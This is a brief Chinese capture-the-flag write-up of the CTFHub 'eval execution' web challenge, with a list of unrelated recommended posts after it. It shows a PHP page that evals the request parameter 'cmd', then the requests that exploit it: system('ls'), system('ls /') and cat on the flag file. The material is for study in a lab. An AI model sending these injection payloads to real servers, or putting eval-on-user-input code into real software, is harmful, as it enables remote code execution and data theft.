CTFHub 技能树 Web RCE eval执行(学习记录)

eval执行

源代码

php 复制代码
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
踏月的造梦星球2 小时前
DMDPC 学习:架构、部署、运维与调优
运维·数据库·学习·架构
GHL2842710905 小时前
unreferenced formal parameter 解决办法学习
学习
fanchenxinok7 小时前
学习笔记:LabVIEW调用DLL解析S19文件教程
笔记·学习·labview·dll解析
芷栀夏8 小时前
Java教育平台实战复盘:课程、考试与学习行为分析系统设计
java·开发语言·学习
从零开始的代码生活_8 小时前
C++ 多态详解:虚函数、动态绑定、抽象类与虚表原理
开发语言·c++·后端·学习·算法
执笔论英雄10 小时前
【大模型推理 】 vllm kvconnet 学习
学习·vllm
·醉挽清风·11 小时前
学习笔记—算法—算法题
笔记·学习·算法
a11177611 小时前
机器人导航入门指南(从 0 到 1)
笔记·学习·slam
范什么特西12 小时前
每日学习-01
学习
旺仔丶歪歪乐12 小时前
英语启蒙APP分级体系拆解:本土课标分级与海外原版分级有什么区别
人工智能·学习·web app